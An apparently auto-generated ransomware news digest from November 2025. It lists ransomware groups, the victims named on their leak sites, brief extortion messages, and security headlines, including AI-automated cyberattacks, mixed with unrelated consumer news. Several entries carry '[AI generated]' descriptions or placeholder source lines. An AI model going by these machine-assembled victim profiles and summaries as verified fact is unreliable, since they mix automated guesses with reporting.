Ransomware Update – 2025-11-16

Latest Ransomware News and New File Extensions

• Akira:

  • New Encrypted File Extension: Not specified in the article.
  • Attack Methods: Targeting and exploiting Nutanix Virtual Machines (VMs).
  • Targets: Critical organizations utilizing Nutanix infrastructure.
  • Decryption Status: Not specified; likely requires negotiation with the attackers.
  • Source: Source information not provided in the input data.

• Qilin:

  • New Encrypted File Extension: Not specified in the articles.
  • Attack Methods: Data exfiltration and extortion via leak site publication.
  • Targets: Maresa Logística, SES Société Energies Services, FREEDL GROUP s.r.l., Spark Power, Sol Trading, Trigg Laboratories.
  • Decryption Status: Not specified; negotiation with attackers is the implied path.
  • Source: Source information not provided in the input data.

• Brotherhood:

  • New Encrypted File Extension: Not specified in the articles.
  • Attack Methods: Data exfiltration (claiming specific data sizes) and extortion via leak site publication.
  • Targets: Horst Realty, Spoleta Construction, Cera Stribley, Kaener Personal, Ninas Jewellery.
  • Decryption Status: Not specified; negotiation with attackers is the implied path.
  • Source: Source information not provided in the input data.

• Nova:

  • New Encrypted File Extension: Not specified in the articles.
  • Attack Methods: Data exfiltration and extortion via leak site publication. Claims a large data leak (3TB) from one victim.
  • Targets: University of Gävle (Sweden), Saude Fortaleza (Brazil), Stark Shipping (Ukraine), ANG BROTHERS (M&E) PTE. LTD. (Singapore), SWISS ROSE Factory (Iraq), Medidores Industriales y Medicos SA de CV.
  • Decryption Status: Not specified; negotiation with attackers is the implied path.
  • Source: Source information not provided in the input data.

• Incransom:

  • New Encrypted File Extension: Not specified in the article.
  • Attack Methods: Data exfiltration and extortion via leak site publication.
  • Targets: Eakas Corp., a Tier 1 supplier to the US automotive industry.
  • Decryption Status: Not specified; negotiation with attackers is the implied path.
  • Source: Source information not provided in the input data.

• Other Active Groups:

  • Attack Methods: Data exfiltration and extortion via public shaming on leak sites.
  • Targets:
    • Alphalocker: Bangkok Eagle Wings Co.,Ltd. (Thailand)
    • Crypto24: Bayu Buana Travel Service
    • Handala: Claimed an attack on Shabak’s airport security systems.
    • Killsec: Force Brokerage
    • Safepay: Killingly Public Schools (USA)
    • Worldleaks: UNOde50 (Spain), Jefferson Enterprises, LLC, Platinum Healthcare Staffing, Herman & Chamow.
  • Decryption Status: Not specified for any of the victims.
  • Source: Source information not provided in the input data.

Observations and Further Recommendations

• A wide array of ransomware groups remains highly active, targeting a diverse range of global industries including logistics, manufacturing, education, government, and healthcare. This demonstrates the sector-agnostic and widespread nature of current ransomware threats.
• The Akira ransomware group is specifically noted for evolving its tactics to target Nutanix virtual machine infrastructure, highlighting a trend of attackers focusing on specialized and high-value enterprise technologies.
• North Korean threat actors continue to innovate, now using JSON storage services for covert malware delivery and engaging in IT worker fraud to generate revenue, posing a persistent and multifaceted threat.
• Organizations should prioritize patching critical vulnerabilities, such as the flaws in XWiki and FortiWeb mentioned in the reports, as these are actively exploited by threat actors for initial access.

News Details

• RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet: The botnet malware known as RondoDox has been observed targeting unpatched XWiki instances against a critical security flaw that could allow attackers to achieve arbitrary code execution. The vulnerability in question is CVE-2025-24893 (CVSS score: 9.8).
• Five Plead Guilty in U.S. for Helping North Korean IT Workers Infiltrate 136 Companies: The U.S. Department of Justice (DoJ) on Friday announced that five individuals have pleaded guilty to assisting North Korea’s illicit revenue generation schemes by enabling information technology (IT) worker fraud in violation of international sanctions.
• North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels: The North Korean threat actors behind the Contagious Interview campaign have once again tweaked their tactics by using JSON storage services to stage malicious payloads.
• Microsoft: Windows 10 KB5068781 ESU update may fail with 0x800f0922 errors: Microsoft has confirmed it is investigating a bug causing the Windows 10 KB5068781 extended security update to fail to install with 0x800f0922 errors on devices with corporate licensing.
• Decades-old ‘Finger’ protocol abused in ClickFix malware attacks: The decades-old “finger” command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.
• Jaguar Land Rover cyberattack cost the company over $220 million: Jaguar Land Rover (JLR) published its financial results for July 1 to September 30, warning that the cost of a recent cyberattack totaled £196 million ($220 million) in the quarter.
• Logitech confirms data breach after Clop extortion attack: Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July.
• Five plead guilty to helping North Koreans infiltrate US firms: The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea’s illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft.
• Anthropic claims of Claude AI-automated cyberattacks met with doubt: Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company’s Claude Code AI model.
• Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks: Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited.
• Tim Cook could step down as Apple CEO next year: According to the Financial Times, Tim Cook could step down as Apple CEO as early as next year. And the board has started to seriously work out a succession plan. FT says that John Ternus, Apple’s senior vice-president of hardware engineering, is considered the frontrunner for the position.
• Here are 25 of our favorite outdoorsy deals from REI’s massive Holiday Sale: REI doesn’t do Black Friday, but that doesn’t mean you won’t be able to save this holiday season. The outdoor retailer’s annual Holiday Sale is now underway and runs through November 24th, offering up to 30 percent off gadgets and gear designed for the outdoors.
• Possessor(s) is a fast-paced action game that gets off to a slow start: I remember being blown away by the 2024 reveal trailer for Possessor(s), the new game from Hyper Light Drifter developer Heart Machine. The trailer features a striking art design, where an animated 2D character explores and fights in side-scrolling environments with gorgeous 3D backgrounds, and it’s all set to moody, powerful music.
• How to find music you will love without the algorithm: While there is plenty of criticism to be hurled at what music the algorithm serves to us, and how, the real problem with music discovery in the age of algorithmic recommendations is that listening has become a passive activity. It’s too easy to press play and let a pile of code take the wheel.
• Framework’s franken-laptop is back with big chip upgrades and familiar frustrations: Framework did it again. It promised modular, upgradeable, and user-repairable laptops where other manufacturers dare not venture or have outright failed. And it’s delivered. The 2025 version of the Framework Laptop 16 comes with not only new AMD Ryzen AI CPU options, but also Wi-Fi 7, a more powerful USB-C charger, redesigned cooling, and a new webcam.
• The Steam Machine feels like the TV gaming PC I’ve always wanted: The morning of Monday, October 27th, I started my workweek by asking my colleagues at The Verge for advice on buying a gaming PC. I wanted a small, portable, and semi-powerful machine that could easily sit beneath my living room TV and occasionally move over to my desk to play games or even use for work.
• Pluribus’ third episode throws a bomb into things: If you weren’t clear on just what a miserable person Carol (Rhea Seehorn) is, episode 3 of Pluribus sure makes it obvious. It opens with a flashback, as Carol and her partner Helen (Miriam Shor) are on a dream vacation at an ice hotel in Norway, and all she can do is complain about how cold it is.
• YouTube TV, ESPN, and Disney: the latest on the blackout that’s now over: Disney and YouTube have reached an agreement to bring back ESPN and more than 20 other Disney-owned channels two weeks after they went dark on YouTube TV.
• Disney and ESPN are back on YouTube TV: ESPN and other Disney-owned channels will be returning to YouTube TV following a new agreement announced Friday. More than 20 channels went dark on YouTube TV on October 30th, but two weeks later — and after CEOs Bob Iger and Sundar Pichai reportedly got more involved in negotiations — the companies have reached a deal.
• The best early Black Friday deals we’ve found so far on laptops, TVs, and more: Black Friday is the most anticipated day of the year for bargain hunters. While there’s still some time to go before November 28th, we’re already starting to see a healthy selection of early discounts, allowing you to get a jump on your holiday shopping.
• Akira RaaS Targets Nutanix VMs, Threatens Critical Orgs: The Akira ransomware group has been experimenting with new tools, bugs, and attack surfaces, with demonstrated success in significant sectors.
• New Security Tools Target Growing macOS Threats: A public dataset and platform-agnostic analysis tool aim to help organizations in the fight against Apple-targeted malware, which researchers say has lacked proper attention.
• Hardened Containers Look to Eliminate Common Source of Vulnerabilities: A kitchen-sink approach to building containers has loaded many with vulnerabilities. A handful of companies are trying to slim them down.
• 150,000 Packages Flood NPM Registry in Token Farming Campaign: A self-replicating attack led to a tidal wave of malicious packages in the NPM registry, targeting tokens for the tea.xyz protocol.
• Learning Sales Skills Can Make Security Professionals More Effective: Amazon Web Services VP Sara Duffer highlights the top lessons she brought back to her security role after taking part in Amazon’s shadow program.
• 🏴‍☠️ Qilin has just published a new victim : Maresa Logística: N/A
• 🏴‍☠️ Alphalocker has just published a new victim : www.bew.co.th: Bangkok Eagle Wings Co.,Ltd. 67/14 Mu 5 Chuamsamphan Rd. Kokfad. Nongchok. Bangkok 10530. Thailand. Stamping process Welding and assembly process Machining process Painting process
• 🏴‍☠️ Qilin has just published a new victim : SES Société Energies Services: N/A
• 🏴‍☠️ Qilin has just published a new victim : FREEDL GROUP s.r.l.: N/A
• 🏴‍☠️ Brotherhood has just published a new victim : Horst Realty: Contains: 27 Gb compressed Files, Emails
• 🏴‍☠️ Brotherhood has just published a new victim : Spoleta Construction: Contains: 4 Gb compressed Free Files + 33 Gb compressed Paid Files, Database
• 🏴‍☠️ Brotherhood has just published a new victim : Cera Stribley: Contains: 2 Gb compressed Free Files + 138 Gb compressed Paid Files
• 🏴‍☠️ Brotherhood has just published a new victim : Kaener Personal: Contains: 139 Gb compressed Paid Files
• 🏴‍☠️ Brotherhood has just published a new victim : Ninas Jewellery: [AI generated] Nina’s Jewellery is a family-owned jewelry business with over 30 years of experience in the industry. Based in Australia, it offers a wide selection of fine jewelry featuring diamonds, colored gemstones, gold and pearls.
• 🏴‍☠️ Nova has just published a new victim : University of Gävle: University of Gävle is a university college located in Gävle, Sweden. The university was established in 1977 and is currently organized into three academies and nine departments.
• 🏴‍☠️ Nova has just published a new victim : Saude Fortaleza: Secretaria Municipal de Saude de Fortaleza is a company that operates in the Custom Software & IT Services industry. It employs 20 to 49 people and has 10M to 25M of revenue. The company is headquartered in Brazil.
• 🏴‍☠️ Nova has just published a new victim : Stark Shipping: Ukraine. A maritime service provider with extensive experience in the Black and Azov seas. Offers port agency services, cargo chartering (for bulk and liquid goods), and market analysis for customers.
• 🏴‍☠️ Nova has just published a new victim : ANG BROTHERS (M&E) PTE. LTD. (P1): ANG BROTHERS (M&E) PTE. LTD. (the “Company”) is a Exempt Private Company Limited by Shares, incorporated on 22 July 2002 (Monday) in Singapore . The address of the Company’s registered office is in the SHUN LI INDUSTRIAL PARK estate.
• 🏴‍☠️ Nova has just published a new victim : SWISS ROSE Factory: Swiss Rose is a prominent company in the Iraqi market, recognized for its O2 brand, which focuses on various care products. Their offerings include home care, fabric care, surface care, and personal care categories.
• 🏴‍☠️ Nova has just published a new victim : Medidores Industriales y Medicos SA de CV: MYIMSA specializes in industrial and medical instrumentation, particularly in the field of nuclear medicine. The company offers advanced technology and highly trained experts to ensure precise results for sample processing.
• 🏴‍☠️ Qilin has just published a new victim : Spark Power: N/A
• 🏴‍☠️ Handala has just published a new victim : Smile for the Camera – Handala Is Watching: This Saturday, Handala RedWanted decided to do things differently. We set our sights directly on the Shabak, your regime’s so-called security guardians. But do you truly feel safe? As long as we are here, that’s little more than an illusion.
• 🏴‍☠️ Killsec has just published a new victim : Force Brokerage: Price ??? Disclosures 0/1
• 🏴‍☠️ Crypto24 has just published a new victim : Bayu Buana Travel Service: We have successfully extracted over 500GB of documents from your internal network, including internal company documents, customer and project information, and other data stored within your internal systems.
• 🏴‍☠️ Safepay has just published a new victim : killinglyschools.org: Killingly Public Schools is a K-12 public school district based in Danielson, Connecticut, serving students in the town of Killingly. …
• 🏴‍☠️ Incransom has just published a new victim : eakas.com: Eakas Corp. specializes in producing both functional and decorative products for the automotive industry, serving as a Tier 1 supplier to manufacturers in the United States. Revenue: $81.3 Million.
• 🏴‍☠️ Qilin has just published a new victim : Sol Trading: N/A
• 🏴‍☠️ Worldleaks has just published a new victim : UNOde50: [AI generated] UNOde50 is a Spanish jewelry and accessory brand. Established in the late ’90s, it initially created only 50 units of each design, hence its name which translates as “One of 50.”
• 🏴‍☠️ Worldleaks has just published a new victim : Jefferson Enterprises, LLC: [AI generated] N/A
• 🏴‍☠️ Worldleaks has just published a new victim : Platinum Healthcare Staffing: [AI generated] Platinum Healthcare Staffing is a company that specializes in providing skilled medical professionals to healthcare facilities. Established in 2005 in Los Angeles, California…
• 🏴‍☠️ Worldleaks has just published a new victim : Herman & Chamow: [AI generated] “Herman & Chamow” is a certified public accounting firm based in California. Its primary services revolve around auditing, accounting, and tax-related matters.
• 🏴‍☠️ Qilin has just published a new victim : Trigg Laboratories: N/A